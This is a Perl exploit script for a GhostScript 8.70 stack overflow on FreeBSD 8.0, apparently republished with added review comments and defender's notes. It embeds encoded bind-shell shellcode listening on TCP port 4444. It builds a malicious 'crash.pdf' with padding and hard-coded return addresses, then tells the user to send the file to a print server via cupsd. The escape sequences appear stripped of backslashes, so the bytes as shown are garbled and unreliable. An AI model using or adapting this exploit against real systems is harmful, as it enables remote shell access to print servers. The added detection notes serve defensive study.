
# Title : GhostScript PostScript File Stack Overflow Exploit
# Published : 2010-07-18
# Author : Rodrigo Rubira Branco


##########################################################################
# Check Point Software Technologies - Vulnerability Discovery Team (VDT) #
# Rodrigo Rubira Branco - <rbranco *noSPAM* checkpoint.com>		 #
#									 #
# GhostScript Stack Overflow 						 #
#									 #	
##########################################################################

# bsd/x86/shell_bind_tcp - 214 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# AppendExit=false, PrependSetresuid=false, 
# PrependSetuid=false, LPORT=4444, RHOST=, 
# PrependSetreuid=false
#
# Payload string as generated by Metasploit (per the header above: a
# bind shell for bsd/x86, alpha_upper-encoded, LPORT=4444). It is kept
# verbatim and is only appended to $pkt further down.
#
# Defender's note: if this ever succeeded, the affected host would expose
# an unexpected listener on TCP/4444 -- presumably inside the ghostscript
# process started by cupsd (see the banner below) -- which is easy to
# alert on from a host or network inventory.
my $buf = 
"x54x5axdaxd1xd9x72xf4x5ax4ax4ax4ax4ax4ax43" .
"x43x43x43x43x43x52x59x56x54x58x33x30x56x58" .
"x34x41x50x30x41x33x48x48x30x41x30x30x41x42" .
"x41x41x42x54x41x41x51x32x41x42x32x42x42x30" .
"x42x42x58x50x38x41x43x4ax4ax49x50x31x49x50" .
"x46x30x45x38x4bx4fx44x42x42x31x51x4cx4dx59" .
"x4bx57x50x50x43x5ax45x51x42x4ax44x42x42x4a" .
"x44x50x4ex50x45x31x48x4dx4bx30x51x47x46x30" .
"x46x30x43x5ax45x38x51x48x48x4dx4bx30x4dx59" .
"x51x57x4ax4cx48x30x43x5ax48x4dx4dx50x4ex50" .
"x45x4ex48x4dx4dx50x50x50x50x50x43x5ax51x4a" .
"x50x58x48x4dx4dx50x4bx4fx50x4fx4ax44x43x49" .
"x4bx46x46x30x42x48x46x4fx46x4fx44x33x42x48" .
"x43x58x46x4fx43x52x45x39x42x4ex4bx39x4bx53" .
"x46x30x46x34x50x53x50x50x48x30x47x4bx48x4d" .
"x4dx50x41x41";

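# The document body that gets written to crash.pdf: a short header,
# fixed-size filler, the values the author hard-coded for the target build
# (one of them labelled as the shellcode address), more filler, then $buf
# padded with "C" so that padding plus $buf always totals 1200 characters,
# and a 100-character tail. $buf is declared above; this block only reads it.
# Declared with `my` instead of as an implicit package global so the script
# also passes under `use strict`.
# NOTE(review): the sizes and values are specific to the GhostScript 8.70 /
# FreeBSD 8.0 build named in the banner below (per the author) and are
# reproduced exactly as published.
my $pkt = "e!PS"
    . "A" x 500
    . "00001111222233334444555556666777788889999aaa"
    . "x40xd9xbfxbf"    # Shellcode Addr (author's label)
    . "bccccddd"
    . "xefxbexbfxbf"
    . "ffff"
    . "xffxbf" x 100
    . "C" x (1200 - length($buf))    # `x` binds tighter than `.`
    . $buf
    . "Z" x 100;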

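# Progress banner on STDERR so STDOUT only carries the final hint.
# Message strings are kept exactly as published.
print STDERR "Check Point Vulnerability Discovery Team (VDT)n";
print STDERR "GhostScript 8.70 exploit for FreeBSD 8.0!n";
print STDERR "Rodrigo Rubira Branco (BSDaemon)n";

print STDERR "nCreating evil pdf ...";

# Write $pkt (built above) to crash.pdf in the current directory.
# Three-arg open on a lexical handle, and open/print/close are all checked:
# the original used a bareword two-arg open and ignored its result, so a
# failed open still printed "d0ne!". binmode keeps the bytes as-is on
# platforms that would otherwise translate newlines.
#
# Defender's note: the output is mostly long runs of one repeated byte
# ("A" x 500, "C" x hundreds, "Z" x 100), which no real PS/PDF producer
# emits -- a simple content check on jobs reaching the spooler catches it.
my $out_file = 'crash.pdf';
open my $out, '>', $out_file or die "open $out_file: $!";
binmode $out;
print {$out} $pkt or die "write $out_file: $!";
close $out or die "close $out_file: $!";

print STDERR " d0ne!n";
print "Now print it via cupsd!n";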